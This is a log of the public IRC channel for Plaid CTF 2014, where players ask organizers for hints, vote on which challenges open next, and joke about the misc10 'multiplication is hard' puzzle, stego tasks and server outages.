<s3Rious> Ymgve: I've done it. Now I have a headache....
<tokki> hudak is giving me cancer
<kanghee> I'm starting to hate white cats
<sorin_> i also have issues there kanghee
<tokki> lol
<fal7Q> :)
<player10> executable
<x7r0n> any ops for for100 ? or what is the pattern for it ?
<corpille> so stega much cool
<tylerni7> x7r0n: I mean
<+tylerni7> it's stego
<+tylerni7> find hidden flage
<+tylerni7> very hidden
<+x7r0n> i got it
<tylerni7> much flage
<+player10> much secret?
<tylerni7> so stego
<+x7r0n> can i pm u
<tylerni7> x7r0n: sue
<+x7r0n> i mean i feel its the correct..can i ?
<x7r0n> ok :-)
<tylerni7> Gynvael: it's getting fixed..
<+Gynvael> ack
<tylerni7> sorry
<Gynvael> no worries, just making sure it's not an IP backdoor, but a TCP one
<Gynvael> ;D
<Guest76035> So for tiffany, if I am running outside a debugger, should I be seeing ptrace errors?
== Mawat [~Mawat@97e4e410.skybroadband.com] has joined #pctf
<tylerni7> Gynvael: xP
<tylerni7> backdoor? whatever could you mean :O
== Stean [~Stean@95-89-213-155-dynip.superkabel.de] has joined #pctf
<jduck> Gynvael: did you try dirbuster?
<Gynvael> tylerni7: nevermind, I mixed up the tasks
<Gynvael> jduck: hey man
<jduck> ;D
<tylerni7> ;)
<+tylerni7> hey jduck
<+Gynvael> jduck: yeah! it couldn't connect on 1 server, to I started it on amazon 100 machines
<tylerni7> lol
<+Gynvael> jduck: just to be sure I get my fair share of cpu
== netsurf3 [~netsurf3@cpc10-stav16-2-0-cust832.aztw.cable.virginm.net] has joined #pctf
<tylerni7> when we give source, it really makes me sad when people use dirbuster
<+jduck> LOL
== olkis [4e087709@gateway/web/freenode/ip.] has joined #pctf
<Gynvael> hahahaha
<Gynvael> lolz
<robbje> people will always use dirbuster :>
<tylerni7> we should really set up some IDS or something that auto detects dirbuster
<+robbje> dirbusters gonna dirbust!
<jduck> they were hoping for http://challenge.server/key.txt
<mongo12> ban all dirbusters!
<mongo12> and then hang them
<mongo12> \o/
<tylerni7> yeah, we block IPs when stuff DoS's
<+foundation> tylerni7: it could be a research paper, IDS that detect only lame attacks and lets in sophisticated ones!
<Gynvael> tylerni7: reply with fake flags on common dirbuster queries
<Gynvael> haha
<tylerni7> foundation: haha
<+mongo12> haha
== InternalCumBustI [43a49c58@gateway/web/cgi-irc/kiwiirc.com/ip.] has joined #pctf
<jduck> Gynvael: nooooo, they they will try to submit them all!
<mongo12> in most cases, you could probably do, more than X reqs in Y secs, iptables drop for 5min
<mongo12> should stop it pretty fast
<Pitr_> Time to introduce fake flags with penalty-points
<jduck> :)
<foundation> you know what i'm gonna do for the next time, i'll make a fake stegano tool and put it on SF and github , and pwn people that use random tools to try to solve stupid stegano challenges
<wa1ker> !misc
== Adran [adran@botters/staff/adran] has joined #pctf
<foundation> who opens a stegano challenge , anyway?
== Cailou [~Cailou@] has joined #pctf
== knc [310f825d@gateway/web/freenode/ip.] has joined #pctf
<Gynvael> jduck: that's the idea!
<Gynvael> jduck: and each flag, -10 points!
<Gynvael> ;D
<Gynvael> flags of shame or sth
<tylerni7> Gynvael: xD
<+tylerni7> we've discussed things like this >.<
<+Gynvael> hah ;)
<Gynvael> awesome
<InternalCumBustI> im so confused on doge_stego I know where the message is but i have no clue how to get it
== fal7Q [~root@pc121.riednet.wh.tu-darmstadt.de] has left #pctf []
<player10> copy paste
<InternalCumBustI> copy paste what?
<ShortKidd> ohhey heartbleed worked the first time.
<player10> copy paste the flag
<pctf_scoreboard> gcc server is up. thank you for you patience and flying PPPair.
<+tylerni7> heh
<+Gynvael> thanks
<mouth`> argh whatscat! we've exploited you why you no give flag??
<ShortKidd> HAve you asked nicely?
<tylerni7> mouth`: you can pm me perhaps
<+tylerni7> you probably didn't exploit it hard enough
<tylerni7> :)
<+player10> did you try turning your exploit off and on again?
<ShortKidd> Try asking nicely. I know I wouldn't do something for you if you exploited me.
<halfvollemelk> any tips for rendezvous challenge?
<halfvollemelk> i'm stuck
== ir|na [~i@swarm.cs.pub.ro] has quit [Quit: leaving]
<n00bz> who i can pm about web300?
<mouth`> tried asking the t-rex nicely yeah
<Adran> trex cat must be repaired :>
<iZsh> the number of PM is increasing it seems
<tylerni7> ?
<+Mawat> The Chandler relay servers, is there just 1?
<tylerni7> Mawat: there are multiple
<+Mawat> So I can use any?
<tylerni7> houqp: is the authority though (it's his problem)
<+houqp> yes
<+houqp> any of them will work
== pctf533 [46b9d762@gateway/web/freenode/ip.] has joined #pctf
<asmoday> I cannot get shit on this
<houqp> have you tried poop?
<+Anyny0> x)
<tokki> lol
<asmoday> whatacat failed to email, mtpox got admin.php failed, heartbleed none of my scripts dump anything, paris ollydbg just execptions, pyjail just get registers no flags
<asmoday> time to apply at mcdonalds or walmart
<pctf533> lol
<Brooklynt_Overfl> Everyone needs a plan B. There is always stripping.
<nullProtectorate> lol
<x_x> Just solved my first stego challenge. Walmart avoided. Faith in self, restored.
<x_x> >_>
<x_x> <_<
<asmoday> I have a not so large member, so perhaps nursing home stripping
<tylerni7> lol
<+gbarboza> Awk
* tylerni7 almost spat water on his screen
<asmoday> like bad grandpa deal
<asmoday> anybody want to get addicted to drugs instead of these crazy challenges
== TMT [~taktaz_m2@] has quit [Ping timeout: 240 seconds]
== ari_ [~ari_@dy869-1-82-228-24-60.fbx.proxad.net] has joined #pctf
== bobsteam [1817f0b6@gateway/web/freenode/ip.] has joined #pctf
<asmoday> this is too stressful for multitasking
<x7r0n> 2012 pwnies
<x7r0n> guess u shld have made 2014
<x7r0n> :-p
<anyny0> Probably
<tylerni7> a13k: almost certainly
<+houqp> a13k: you know the solution?
<+anyny0> Not being able to connect is part of it
<a13k> tylerni7: thanks.
<a13k> houqp: maybe
<houqp> ok pm me please :)
<a13k> will pm if they don't work
<anyny0> Any hints for WhatsCat? I really have no clue on where might the exploit be
<cybertech> so i am trying to find out the twenty cypto
<cybertech> i found the key
<cybertech> but its not the flag
<cybertech> but than i found a poem
<anyny0> The flag might be in the poem
<tylerni7> maybe specifically towards the end
<+a13k> houqp: issue is on my end
<mserrano> lol
<halfvollemelk> tips for rendezvous? i could rly use one
<houqp> nice :)
<+a13k> houqp: never hurts to ask though :-p I've ran/cometed in enough ctf's to know to ask if things are working as expected before beating my head against the desk
<mserrano> Good job hellman! there goes wheee
<+houqp> a13k: yeah, rendezvous behaviours like it's down most of the time, which is sad :(
<+tylerni7> nice mslc :)
<+houqp> halfvollemelk: scroll back
<+Cimmi> cybertech: look at the end
<hellman> open more crypto, i can't look at rsa :/
<tylerni7> hahah
<+mserrano> hellman: lol why not
<+tylerni7> why not xD
<+a13k> houqp: I kinda figured that. seemed obvious from the initial text from the challange. the issue I had was some configs
<anyny0> Could someone give me a tiny lead on whatsCat?
<cybertech> cimmi i am
<cybertech> i dont get it
== reanimus [~animus@96-32-143-144.dhcp.gwnt.ga.charter.com] has joined #pctf
<mserrano> voting is open
<+mserrano> I would recommend voting for chance
<+mserrano> you've gotta get something this time :P
== ebeip90 [~user@] has joined #pctf
<tylerni7> that's how randomness works, sure
<+tylerni7> -_-
<+mserrano> yup
<+mserrano> it is
<+x_x> Yeah, twenty is giving me a headache, too. Found the flag, but it doesn't accept.
<tylerni7> x_x: pm me/
<+mserrano> x_x: pm me what you think the flag is
<+mserrano> or tylerni7
<+asmoday> all in all am learning a bit, I really hate the plague though, now that move is ruined
<tylerni7> heh
<+Cimmi> The flag should be readable as a sentence
<arthurdent> asmoday: hold your tongue sir
<arthurdent> that movie is a classic
<corewar> it can never be ruined
<asmoday> classic pain the arse
<asmoday> that gcc though
<pctf_scoreboard> that movie is the best
<+asmoday> plague could go back and become Dades dad
<arthurdent> wat
<asmoday> then move through time and impregnate kate then really screw things up for Zero Cool
<tylerni7> lol
<+asmoday> after that Penn aka Hal can do some magic with Teller who was in the movie as Gibson Mainframe
<asmoday> oh Phiber if you only knew
== badeec [~badeec@2a02:810d:640:7bc:6a5d:43ff:fe80:ce1a] has quit [Quit: Leaving]
<arthurdent> now that you mention it, gibson mainframe never spoke
== ghostpixel [~quaid@hsv.pikewerks.com] has joined #pctf
<asmoday> right haha
<asmoday> and Penn is never far from Teller
<asmoday> its like his liver, little and full of stress
<asmoday> I am surprised finding flight 370 wasnt a flag on this....
<asmoday> too soon, too soon....
== Mawat [~Mawat@97e4e410.skybroadband.com] has joined #pctf
<n00b13> what is the input key length for web 150
<cai_> heh we have over 1000 registered teams now :p (780 of them have at least 1 point)
== chunderstruck1 [~daniel@184-98-244-58.phnx.qwest.net] has quit [Quit: Leaving.]
<tylerni7> ooo dragon sector close to 2nd place
<+cai_> voting ends in 5 minutes
<mserrano> oh man DS
<+mserrano> goin' hard
<+cai_> now in 2nd
<+cai_> nice
<+mserrano> now you just have to catch 0xffa ;)
<tokki> OH SHIT
<tylerni7> zomg, teh chronospherez
<+tylerni7> but yeah voting time :)
<+tokki> wait im still confused tho, if you vote 1, does it skip the opened challs?
<tylerni7> yes
<+n00b13> any hints for web150?
<mserrano> uh
<+cai_> you mean 3
<+mserrano> you mean vote 3
<tokki> k
<tokki> 3
<tokki> i thought skipping as like skipping the tiles for opened challs
<mserrano> you are currently at gcc
<+tokki> nvm
<mserrano> lol
<+tokki> lol
<cai_> voting ends soon
<tokki> *gasp* *gaspgasp*
<n00b13> is it just me or should web150 be worth more
<cai_> damn
<+cai_> no luck on chance card
<+cai_> new voting starts
<+cai_> you have 5 mins :)
== Cailou [~Cailou@] has quit [Ping timeout: 245 seconds]
<tokki> wait no i dont think i get the chronosphere thing but i guess its okay
<corpille> crap no luck for today
<tokki> ikr
<houqp> 15:50:31 +tylerni7 | that's how randomness works, sure
<+asmoday> I am playing pokemon
<rev1550> is anyone else having problems download doge_stege
<tokki> go pikachu!!!!!!!!!
* tokki throws hamster
<cai_> tokki: what don't you get it?
<+tokki> k so you guys said that the voting skips opened challs
<cai_> the hatched tile is where the current position is
<+cai_> yes it does
<+tokki> so if you vote like 1 right now,
<cai_> it will open pwnables 150
<+tokki> where do you go
<cai_> at the end of the present board
<+tokki> OH I GET IT
<cai_> :)
<+tokki> OH
<mserrano> 1 -> pwnable 150; 2 -> reversing 250; 3 -> pwnable 200; 4 -> forensics 350; 5 -> crypto 250; 6 -> misc 10
<+tokki> sry for my idioticness
<mserrano> pls misc 10
<+mserrano> or
<+mserrano> forensics 350
<+tokki> pls misc 10
<mserrano> or
<+tokki> pls
<corpille> misc 10
<mserrano> pwnable 150
<+tokki> pls
<cai_> lol
<+anyny0> Mis 10 :D
<tokki> pls misc
<tokki> ily guys
<mserrano> no
<+cai_> what about 2-part forensics 350?
<+tokki> pls
<mserrano> pls pwnable 150
<+mserrano> or 2-part forensics
<+tokki> pls misc 10
<Hertz_> pls nothing
<tokki> pls
<tokki> lol
<mserrano> Hertz_: lo
<+mserrano> l
<+tokki> i aint got time fo dat
<asmoday> is the point to just do pokemon forever
<tokki> pokemon!
<asmoday> its stuck on chaning art i think
<asmoday> changing
<asmoday> ha i think i broke it
<cai_> misc10 is opened
<+cai_> lol
<+cai_> you guys win
<mserrano> lol
<+tokki> ILYyYYYYY
<tokki> ♥︎
<mserrano> lol
<+cai_> time to watch people submitting wrong number
<+cai_> lol
<+mserrano> everyone is guessing the wrong thing
<+tokki> lol
<mserrano> like literally everyone
<+tokki> lol
<subsnake> will there be any hints soon?
<tokki> lemme join ;)
<mserrano> YEAH BS LABS
<+cai_> grats BS Labs
<+mserrano> FIRST BLOOD
<tokki> 300G
<cai_> voting is up again lol
<+mserrano> yay MSLC
<+mserrano> and H4x0rPsch0rr
<+mserrano> there goes the breakthrough
<+anyny0> Hmm
<cai_> except there is no bonus point
<+cai_> lol
<+anyny0> x)
<tokki> shet
<mserrano> yay dcua
<+mserrano> 4 solves
<+tokki> i cant believe im stuck in misc 10
<mserrano> misc 10 is a quality problem
== vooX [4e81ae54@gateway/web/freenode/ip.] has joined #pctf
<tokki> hmm..
<corpille> 38.55 * 1700 mmhh ...
<asmoday> yeah not what you think
<cai_> it's hard
<+tylerni7> yeah man
<+cai_> not everyone can do that correctly
<+tylerni7> multiplication is hard
<+tokki> D:
<tokki> D::
<tokki> D:::::
<tokki> how did people solve dis
<vooX> damn, web300 is more easier than web200..
* subsnake pings tylerni7 pm
* tokki hurls trout
<bobsteam> is it vooX ?
<vooX> yup, at least the kpop one
<vooX> which i'm still fighting with
<mserrano> bubble bubble pop pop
<+bobsteam> ah, I haven't started kpop yet
<tokki> kpop is the best
<bobsteam> I'm too busy hating memes and cats
<cai_> man we are gonna hit 10K submissions soon >:-)
<+tylerni7> lol
<+rray> web300 is frustrating ;_;
== player10 [~root@vps-8685-0281.cloud.tilaa.com] has quit [Ping timeout: 276 seconds]
<tokki> lol
<vooX> not as furstrating as songs-web
<tylerni7> forensics 250 is cool :)
<+cai_> forensics opened
== knc [6a4cc70d@gateway/web/freenode/ip.] has quit []
<tylerni7> good challenge to open up :)
== paraxor [~aoepxnpe@unaffiliated/prazial] has left #pctf []
== frozencemetery [~frozencem@pool-71-174-94-227.bstnma.fios.verizon.net] has quit [Ping timeout: 250 seconds]
<marcan> man, paris took way too long.
<dracu> i don't get the flag for misc10 - i mean i got it, but i don't get it, u know ? :D
<obriencd> i didnt get it so i really dont get it
<cai_> if you got the flag, it would have accepted and gave you points!
<+anyny0> The number's important but have so many flag possibilites D=
<dracu> i actually got the flag
<dracu> and the points :)
== mouth`1 [~mouth@] has joined #pctf
<cai_> ah
<+dracu> but why was that the flag ?
<cai_> the process of getting that flag should've let you know?
<+dracu> yes
<cai_> then you understand why it is what it is :p
<+dracu> yeah... i was just amazed that it said "success"... (wtf?!)
<cai_> :)
<+dracu> fun, but hard ctf 4 n00bs
<cai_> yay over 10K submission \o/
<+houqp> \o/
<tokki> lol
== hammerpig [~user@gateway/tor-sasl/hammerpig] has joined #pctf
<vooX> damn, the last stage of thes web-songs makes me crazy... :(
<NK_> tylerni7: i feel like there is a disturbance in the force
<NK_> the gameboard say our last submission was a day ago
<cai_> NK_: refresh?
<+NK_> same
<cai_> hmm
<cai_> cache flush refresh?
<+NK_> the scoreboard say 15 min though
== mad0na [~subsnake@] has joined #pctf
<cai_> yeah, don't worry about it.. it's just there more for the styles/quick info, but things are correct in db
<+NK_> hm cache flush refresh say the same
<cai_> weird :/
<+NK_> yep
<NK_> let's see on another browser just in case
<vooX> btw, this year, web is pretty hard
<NK_> same with another browser
<tylerni7> vooX: I think normally we don't have much web
<+tylerni7> people asked for more web and forensics
<NK_> yes it's good
<cai_> NK_: strange. it
<+cai_> it's probably cache on our side then
<+tylerni7> we gave them web and forenics that we thought were fun :)
<+cai_> but yeah, i wouldn't worry about it
<+NK_> too much exploit / reverse in the past years
<cai_> thanks for letting us know tho
<+tylerni7> NK_: :/
<+tylerni7> we have more of those challenges too, they just aren't opened yet :P
<+NK_> tylerni7: i know not everyone aggree with this :p
<mrsmith67> can anyone help me with multipliation?
<mrsmith67> i know it has to do with time...
<tylerni7> mrsmith67: multiplication is hard
<+tylerni7> you should have a computer do it
<+NK_> addition, multiplication and division is hard
<NK_> according to the past years
<cai_> math is hard
<pouete> as a question : on __nightmares__ have really nothing to do with pyjail ?
<cai_> NK_: you can guess what will be on next year :)
== psaikonet1 [~psaikonet@cpe-72-179-33-155.austin.res.rr.com] has joined #pctf
== Apple_Eater [~Apple_Eat@mail.appleeater.com] has joined #pctf
<pouete> ( just tried to call ().__nighmares__ . was not disapointed O )
<tokki> :O
== n00bz [~1234@host31-111-dynamic.6-79-r.retail.telecomitalia.it] has joined #pctf
<tokki> me no getz misc 10
<tokki> this is sad
<Pitr_> I get it but only after someone explained it to me 8)
<tokki> hmm
<asmoday> ok seriously for curl, is this a DEP or Reverse
<tylerni7> what do you mean DEP?
<+asmoday> sorry dpe, deep packet inspect
<dct1> johnny DEP
<tokki> LOL
<americhigo> that would be dpi
<asmoday> said the guy who has slept ;p ha
== Frisk0 [~Frisk0@] has quit [Ping timeout: 240 seconds]
<asmoday> is it in the tcpdump or the memory
<Apple_Eater> I had a question with kpop -- just wanted to see if I am on the right track. Anyone around?
<Pitr_> it's DERP
<tylerni7> Apple_Eater: you can pm me
<+tokki> *gasp*
<Apple_Eater> Thanks
<tokki> DERP!!!
<ShortKidd> tyler, are you ever not here?
<tokki> is misc 10 like a nonsense question
<asmoday> this damn game had me questioning 65535 how dare you
<WhizzMan> urgh, multiplication *is* hard
<tokki> like the answer should be like unicorns or something
== killobyte [~killobyte@h140.net36.bmstu.ru] has joined #pctf
<killobyte> hi, who can i ask about whatscat task?
<tylerni7> killobyte: me
<+tylerni7> pm
<+ShortKidd> the heartbleed one, tokki?
<tokki> the multiplication one :p
<ShortKidd> oh lol
== Frisk0 [~Frisk0@2601:7:9e00:8f:ed6f:4299:1327:d3fe] has joined #pctf
<tokki> *gasp* cai is op!
== cai_ changed the topic of #pctf to: [Plaid CTF 2014 - play.plaidctf.com] 24 Hours left | $10 added to each cash prizes so far (from CHANCE card)
<cybertech> the mutiplication one is not working
<tokki> lol
<cybertech> i found the answer is wont take it
<tokki> lol
<subsnake> xD
<Pitr_> cybertech, try querying an admin
<tokki> xD
<cybertech> hmm
<cybertech> no admins on here
<asmoday> cybertech its not 65535
<shadghost> admins are 'voiced' here
<cybertech> hmm
<tokki> lol
<subsnake> nor unicorn
<cybertech> i thought that was the answer
<tokki> damn!
<cai_> cybertech: it will take it when you have the correct answer
<+asmoday> think outside that box
<cybertech> ok
<Yerer> Oh haha
<Yerer> I'm surprised that was the answer for misc10
<cai_> :)
== kiwhacks [~kiwhacks@2a01:e35:87ea:8920:6a5d:43ff:fe86:f128] has joined #pctf
<asmoday> You will punch yourself after knowing the answer
<WhizzMan> oh I'm sure I will
<asmoday> like really hard
<NK_> :)
<tokki> D:
<asmoday> I will kick a baby, luckily none are near me ever, after I get the answer to a few of these
<asmoday> Dramatic over thinking happens at defcon every year
<tokki> D:
<WhizzMan> puppies and kittens will be good supplicants
<pouete> I would like to know if i am on the right track, should i ask my question on the public chan ?
<tylerni7> pouete: pm me
<+tylerni7> may not be able to answer
<+tylerni7> but yeah
<WhizzMan> Yersinia
* tokki depresses over the scoreboard
<Gynvael> agreed
<ShortKidd> let's be depressed together
<Gynvael> eb huh
<tylerni7> Gynvael: you guys got time :)
<+tylerni7> btw which of you solved rsa?
<+Gynvael> adam_i
<cai_> Nice
<+tylerni7> ooo curlcore solve
<+tylerni7> nice
<+cai_> 0xffa
<+cai_> the vote begins :)
<+tokki> *gasp*
<poppopret> anyone wanna push me in the right direction for web150? =/
== poppopret [~poppopret@] has quit [Remote host closed the connection]
<Gynvael> yeah
== plaintext [~dada@bl4-157-214.dsl.telepac.pt] has quit [Ping timeout: 252 seconds]
== poppopret [~poppopret@] has joined #pctf
<Gynvael> protip for web150: staying on IRC after asking question ftw
<tokki> MUST VOTEZ 1
<tylerni7> heh
<+shadghost> lol
<asmoday> FUCK wanted the be the first curlcore
<poppopret> lol it crashed
<poppopret> back
<tokki> that's sad
<tylerni7> poppopret: pm me I guess
<+iZsh> i got curlcore \o/ :)
<tokki> poppopret: our team member has a similar nickname, haha
<tokki> congrats xD
<bool_101> grats
<kiwhacks> what is the format of misc10 multiplication response ?
<cai_> kiwhacks: number
<+cai_> int
<+Zoro> ZOMBIE
<tylerni7> \d+
<+kiwhacks> ok thanks
<subsnake> NUMBER?
<subsnake> !
<tylerni7> ?
<+cai_> i mean, you are multipyling two numbers, what did you expect :p
<+[ToH]bp> 42
<subsnake> unicorn works just fine
<Zoro> that's not how it works
<tokki> guys if there are like no hints till the end of the ctf, wat happens :O
<Adran> not invalid flag? :P
<WhizzMan> "unknown flag"
<Adran> the same thing happens whether there are hints or no hints, the winner(s) win :>
<tokki> this misc should at least be 100 points
<tylerni7> well, keep in mind that multiplication is hard
<WhizzMan> What, no recount?
<Adran> and everyone learns something.
<iZsh> tokki: problem with hints is that it kills the scoreboard :)
<tylerni7> WhizzMan: multiplication is hard, man
<+tokki> :D
<WhizzMan> yeah, it is
<tokki> tylerni7: it is this prob is killing our team
== funtimes [~user@c-68-49-76-217.hsd1.md.comcast.net] has quit [Ping timeout: 246 seconds]
<tylerni7> maybe you should do another problem then :)
<+WhizzMan> tokki: pics!
<Yerer> tokki: Try multiplying them
<tokki> lol
<tokki> hmm
<hellman> open pls more crypto (and other tasks) until morning :)
<Luffy> uh
== [pwn]tayacan [~tayacan@wireless-conference.science.ku.dk] has quit [Quit: Leaving]
<Luffy> is multiplication is hard broken
<tylerni7> Luffy: no
<+NK_> oh
<Luffy> cuz im sure i multiplied them correctly
<cai_> Luffy: it's working fine :)
<+NK_> nooo
<WhizzMan> Luffy: it's hard, that's why
<NK_> this curl is linked to openssl1.0.1e
<Luffy> i feel you guys snickering
<cai_> well, it's hard, so some people couldn't
== Stean [~Stean@95-88-74-196-dynip.superkabel.de] has joined #pctf
== haoz [b44ac723@gateway/web/freenode/ip.] has joined #pctf
<haoz> a
== wolfpack [9807491f@gateway/web/freenode/ip.] has joined #pctf
<tokki> D:
<ShortKidd> b
<haoz> multiplication is hard ?
<Zoro> That's what Misc 10 feels like
<tokki> multiplication is hard.
<Adran> error: cannot divide by zero
<whos_tyler> Zoro: I dont get the joke
<Zoro> have you done misc 10 yet?
<whos_tyler> I have
<whos_tyler> still dont get it
<haoz> i dun get the flag :p
== livinded [~livinded@108-84-156-71.lightspeed.sntcca.sbcglobal.net] has joined #pctf
<duckyTS> misc10 is probably something stupid
== [pwn]Idolf [~idolf@fw-alt2.math.ku.dk] has quit [Ping timeout: 258 seconds]
<nullProtectorate> loł
<tokki> lol
<livinded> 101
<asmoday> some middleschooler is laughing
<tokki> i love how people are like, I solved it but i dont get it
<nullProtectorate> łøł
== vooX [4e81ae54@gateway/web/freenode/ip.] has quit [Quit: Page closed]
<haoz> mind to give some hints ? :p
<kmowery> proofs of work :|
<WhizzMan> for a 10 pt challenge? pfff
<haoz> :X
<WhizzMan> I'm not getting it either, but come on, it's a 10 point challenge
<anyny0> Lol
== mouth` [~mouth@] has joined #pctf
<x_x> This 10 point challenge is mocking me.
<WhizzMan> yes :)
<x_x> Much like my Calculus III grade.
<x_x> Y_Y
<WhizzMan> you and plenty of other people
<Luffy> um
<Luffy> is back and time a typo
<Luffy> did you guyes mean back in time
<x_x> Nope, it's a hint.
<Luffy> it is?
<x_x> Maybe?
<tylerni7> Luffy: that's a typo
<+tylerni7> :P
<+Luffy> oh
* x_x sniffles.
<x_x> I hoped it was a hint.
<Luffy> youre dumb
<tylerni7> Luffy: which problem?
<+Luffy> go away
== be [ac17cef9ca@gateway/web/cgi-irc/kiwiirc.com/x-krbszdhddwaqbbzd] has quit [Quit: http://www.kiwiirc.com/ - A hand crafted IRC client]
<Luffy> was talking about multiplication is hard
<x_x> Multiplication is hard.
<tylerni7> there, it should say "back in time" now
<+shadghost> 1*1=1 , see i can multiply
<Adran> man its like a chant
<cai_> voting ends in 12
<+tokki> ooh
<namrog84> the flag isn't a number is it
<tokki> they've told me it is an 'int' form
<tokki> but are you guys sure
<cai_> namrog84: it is, for multiplication is hard problem
<+WhizzMan> so no flag{12324} but just 12324 ?
<bwn3r> can anyone help me with 150 ? :'(
<bwn3r> web
* tokki goes to corner, checks calculator and cries
<Pitr_> May I complo
<cai_> WhizzMan: yeah, you shouldn't see flag{}.
<Pitr_> May I compliment the creator of misc10 :D
<sqall> much time consuming
<sqall> such depression
<sqall> very unwow :/
<kurtisebear> its making me want to kill myself Im sure I need to think out the box a little but its been annoying me for like 30 mins now
<WhizzMan> no amaze
<tokki> ikr
<x_x> It's both funny, and sad.
<n00bz> lol voox
== ggis [~ggis@fw-alt2.math.ku.dk] has quit [Ping timeout: 245 seconds]
<LMolr> hints for tenement ??
<LMolr> i am trying hard
<LMolr> plz admi
<_ariel> hey guys, i have a problem with reverse 250 (hudak), i have found a key (without patching an app), i get congratz and that's all?
<cai_> _ariel: you can pm me the key you found
<+WhizzMan> you want a medal?
<n00bz> any help for web300?
<tokki> a gold medal!
== wahwah [~wahwah@ctf.inso.tuwien.ac.at] has quit [Ping timeout: 245 seconds]
<mak> To confirm, for reekee you need code execution to be able to find the flag, right?
== InternalCumBustI [43a49c58@gateway/web/cgi-irc/kiwiirc.com/ip.] has quit [Quit: http://www.kiwiirc.com/ - A hand crafted IRC client]
<Hertz_> right mak
== Ph4te [~phate@ctfgate.sec.in.tum.de] has quit [Remote host closed the connection]
<Phshap> damn
<cai_> ##### CHANCE Card: $10 added to the pot again
<+cai_> no hints :'(
<+Phshap> :)
<Phshap> i mean :(
== mode/#pctf [+o cai_] by ChanServ
<Phshap> very L(
<x_x> booo money
<Phshap> who needs money
== cai_ changed the topic of #pctf to: [Plaid CTF 2014 - play.plaidctf.com] 24 Hours left | $20 added to each cash prizes so far (from CHANCE card)
<Pitr_> Chance should have a 'valuta change to BTC' card
<[ToH]bp> dogecoin or bust
<WhizzMan> to the moon
<WhizzMan> Pitr_: 'currency change to MTGOX BTC'
<cai_> web is opened
<+bobsteam> question on reekee >.>
<iago-x86> Hey, can I ask somebody a question about whatscat?
<tylerni7> iago-x86: sure
<+tylerni7> I just refreshed the db
<+_blasty_> is new web supposed to give 500 err ?
<tylerni7> _blasty_: ... probably not h/o
<+halfvollemelk> multiplication is hard...
<grimmlin_> crash double free:
<mongo12> five double oh!!
<grimmlin_> arf, wrong window
<Adran> is halphow2js supposed to be giving 500?
<tylerni7> h/o
<+mongo12> call the nine one one
<tokki> am I still online?
<_blasty_> internet pwn-lice
<jduck> q/uit 502 Bad Gateway
<jduck> oops
<tokki> lol
<shadghost> Burp proxy error: Failed to connect to
<mischa__> halphow2js down?
<namrog84> 65
<tylerni7> ok
<+acez> who can I ping for kappa
<Im11Plus> Web 200 easy
<Im11Plus> Gives you flag, such wow
<haoz> multiplication is hard...
<namrog84> multiplication is hard...
<anyny0> Indeed
<namrog84> just stick it in calculator, made easy!
<tokki> D:...
<tokki> its hard..
<haoz> something wrong with my calculator ? :(
<namrog84> probably
<namrog84> do you have CTF mode enabled?
<tokki> lol
<haoz> lolll....
<x_x> The batteries on my TI died. Cannae enter it into CTF mode.
<tokki> TI's eat a lot of batteries
<x_x> They really do.
== Zoro has changed nick to aobugw4uob49tt34
<tokki> and they are goddamn expensive, heavy,
<halfvollemelk> I'm sure I multiplied it correctly...
<tokki> and yet my scholl makes us buy them..
== aobugw4uob49tt34 has changed nick to Zoro
<trelgak> can anyone push me in the right direction for reversing200? been working on it for forever..
<x_x> I want one of those newer CAS models. They have fancy pants 3D graphing.
<Im11Plus> lul web 200 end.response
<tokki> x_x: rly?! oh god technology
<x_x> Delicious technology
<shortkidd> reverse it, trel
<Zoro> http://play.plaidctf.com/files/g++-30f6a74ce24ea3605ba7cbec92222a72.tar.bz2 - nginx 404 Not Found.
<x_x> Refresh a few times.
<x_x> It'll get there eventually.
<WhizzMan> Heh, multiplication is hard is funnier than you'd think, especially if you know why the answer is what it is
<Luffy> ya
<Luffy> its funny :)
<cai_> WhizzMan: :
<+cai_> :)*
<+tylerni7> trelgak: perhaps
<+x_x> This is just getting cruel.
<tylerni7> you can pm
<+x_x> Like every math professor I've ever had.
<x_x> >_>
<haoz> :|
<halfvollemelk> jo, wtf is this sorcery
<halfvollemelk> suddenly I check my scoreboard and multiplication is solved
<Adran> suddenly math is hard
<halfvollemelk> suddenly i'm even more confused
<[ToH]bp> Infinity - object > []?
<tokki> D:....
<tokki> i still dont get the multiplication is hard
<tokki> its hard
<LMolr> i dont get crypto 20
<LMolr> :/
<tokki> :/
<WhizzMan> halfvollemelk: playing with more people on your team?
<tokki> lol
<haoz> my mathssss....
<LMolr> maybe i am """special"""
<deject3d> crypto 20 is one of the simplest ciphers
<tokki> wat
<tokki> wat?!
<tokki> wat?!?!?
<Lopi> who can I pm with a question regarding a challenge?
<Adran> it was pretty easy
<tylerni7> Lopi: me
<+kiwhacks> misc10 makes me crazy...
<tokki> lol ya
<namrog84> ditto
<Luffy> nah
<Luffy> theyre pretty easy
<Luffy> just gotta think outside the box
<namrog84> im so far outside the box, i dont even know where the box was
<livinded> is reekee getting hammered?
<Adran> I've stretched out the box so much its now a circle
<deject3d> reekee sux
<namrog84> 38.55 * 1700
<namrog84> oops
<shadghost> namrog84: copy past is also hard?
== nofiki1 [~Adium@] has joined #pctf
<namrog84> yes, I am clearly an incapable of normal computer operations
<namrog84> can't even construct a sentence correctly either
<tokki> asdfasdfasdfasfdafsadf
<dkohlbre> is kappa supposed to take as much CPU as watching twitch does? Its making my laptop takeoff :/
== dvddaver [~dvddaver@] has joined #pctf
== shortkidd [60279873@gateway/web/freenode/ip.] has quit [Ping timeout: 240 seconds]
<iago-x86> dkohlbre: It shouldn't
<tokki> twitch pokemon!
<namrog84> woo!! Got multiply is hard!
<namrog84> <- idiot
<tokki> did you get key?
<namrog84> yep :D
<tokki> holy shet, i should be working on it harder
<dvddaver> Anybody solved ezhp?
<namrog84> now back to the awful web150
<Ymgve> dvddaver: only 58 teams
== naam [~naam@] has quit [Read error: Connection reset by peer]
<haoz> im the another idiot >.<
== _ariel [~root@] has joined #pctf
<asmoday> dogestege is that one where I have to find the same image online
<haoz> namrog84 : mind to ...... ? :p
<LMolr> tenement owns me
<tokki> 38.55 * 1700 is freaking 65535
<asmoday> hhahaha
<namrog84> :D
<tokki> :D
<tokki> :D....
<namrog84> ...... there it is, i typed it in, but i think the channel blocks flags :D
<Adran> anyone willing to answer a question about a puzzle/hunt?
<namrog84> just like passwords: ********
<tokki> :D
<acez> tylerni7: who can I ping for kappa ?
<Ymgve> tokki: it's not a 1 pointer
<supersat> man... I love paris. mov eax, 0 mov eax, [eax]
<supersat> luuuuulz
<dickoff> acez: me
<+n00bz> web300 is down
<tokki> :D
